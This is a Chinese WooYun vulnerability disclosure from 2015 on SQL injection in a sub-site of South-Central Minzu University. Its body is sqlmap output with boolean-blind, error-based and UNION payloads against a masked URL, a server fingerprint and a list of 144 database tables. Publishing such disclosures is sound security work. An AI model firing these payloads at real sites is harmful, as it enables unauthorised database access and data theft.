当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152574

漏洞标题:中南民族大学某分站存在SQL注入

相关厂商:CCERT教育网应急响应组

漏洞作者: 龍 、

提交时间:2015-11-09 14:26

修复时间:2015-11-22 11:18

公开时间:2015-11-22 11:18

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

http://**.**.**.**/smkx/newsopen.php?id=184


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=184 AND 9426=9426
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=184 AND (SELECT 7771 FROM(SELECT COUNT(*),CONCAT(0x7173636d71,(S
ELECT (CASE WHEN (7771=7771) THEN 1 ELSE 0 END)),0x716e617071,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: id=-2694 UNION ALL SELECT NULL,CONCAT(0x7173636d71,0x4b447362455959
464a75,0x716e617071),NULL,NULL,NULL,NULL,NULL#
---
[14:13:15] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: PHP 5.2.6, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] smkx

漏洞证明:

Database: smkx
[144 tables]
+---------------------------+
| option |
| admin |
| any_admin |
| any_attachment |
| any_categories |
| any_essay |
| any_log |
| any_role |
| any_user |
| g110 |
| genliuyan |
| ggao |
| guanli |
| haic |
| ip |
| ip_allow |
| js |
| jshu |
| md_smkx_admin888 |
| md_smkx_link |
| md_smkx_news |
| md_smkx_newscata |
| md_smkx_sigle |
| mdhy_admin888 |
| mdhy_link |
| mdhy_news |
| mdhy_newscata |
| mdhy_sigle |
| mdhy_temp |
| mdhy_vote |
| mdsky_admin888 |
| mdsky_book |
| mdsky_link |
| mdsky_news |
| mdsky_newscata |
| mdsky_newsold |
| new_class |
| phome_ecms_infoclass_news |
| phome_ecms_infotmp_news |
| phome_ecms_news |
| phome_ecms_newsutf8 |
| phome_enewsad |
| phome_enewsadclass |
| phome_enewsbefrom |
| phome_enewsbq |
| phome_enewsbqtemp |
| phome_enewsbuybak |
| phome_enewscard |
| phome_enewschecktext |
| phome_enewsclass |
| phome_enewsdo |
| phome_enewsdolog |
| phome_enewsdownerror |
| phome_enewsdownrecord |
| phome_enewsdownurlqz |
| phome_enewsf |
| phome_enewsfava |
| phome_enewsfavaclass |
| phome_enewsfeedback |
| phome_enewsfeedbackclass |
| phome_enewsfile |
| phome_enewsgbook |
| phome_enewsgbookclass |
| phome_enewsgroup |
| phome_enewsinfoclass |
| phome_enewskey |
| phome_enewslink |
| phome_enewslinktmp |
| phome_enewslisttemp |
| phome_enewslog |
| phome_enewsmember |
| phome_enewsmemberadd |
| phome_enewsmembergroup |
| phome_enewsmod |
| phome_enewsnewstemp |
| phome_enewsnotcj |
| phome_enewspage |
| phome_enewspic |
| phome_enewspicclass |
| phome_enewspl |
| phome_enewsplwords |
| phome_enewspostdata |
| phome_enewspublic |
| phome_enewssearch |
| phome_enewssearchtemp |
| phome_enewsshopdd |
| phome_enewsshoppayfs |
| phome_enewsshopps |
| phome_enewstable |
| phome_enewstempvar |
| phome_enewsuser |
| phome_enewsvote |
| phome_enewswords |
| phome_enewswriter |
| phome_enewszt |
| title |
| tpzt |
| wenjian |
| wlssys_admin888 |
| wlssys_book |
| wlssys_gustbook |
| wlssys_link |
| wlssys_news |
| wlssys_newscata |
| wlssys_newsold |
| xbswx_classdeclarecontent |
| xbswx_declarecate |
| xbswx_judge |
| xbswx_onlineuser |
| xbswx_select |
| xbswx_settings |
| xbswx_sitearticle |
| xbswx_sitebook |
| xbswx_sitecategory |
| xbswx_sitecourse |
| xbswx_sitefriendlink |
| xbswx_sitemodule |
| xbswx_statistic |
| xbswx_systemaction |
| xbswx_systemuser |
| xbswx_teacher |
| xbswx_video |
| xbswx_votes |
| xbswx_votetoplic |
| xdyqx_classdeclarecontent |
| xdyqx_declarecate |
| xdyqx_onlineuser |
| xdyqx_settings |
| xdyqx_sitearticle |
| xdyqx_sitebook |
| xdyqx_sitecategory |
| xdyqx_sitecourse |
| xdyqx_sitefriendlink |
| xdyqx_sitemodule |
| xdyqx_statistic |
| xdyqx_systemaction |
| xdyqx_systemuser |
| xdyqx_teacher |
| xdyqx_video |
| xdyqx_votes |
| xdyqx_votetoplic |
| xinxi |
| zhuye |
| ztlm |
+---------------------------+

修复方案:

版权声明:转载请注明来源 龍 、@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-22 11:18

厂商回复:

最新状态:

暂无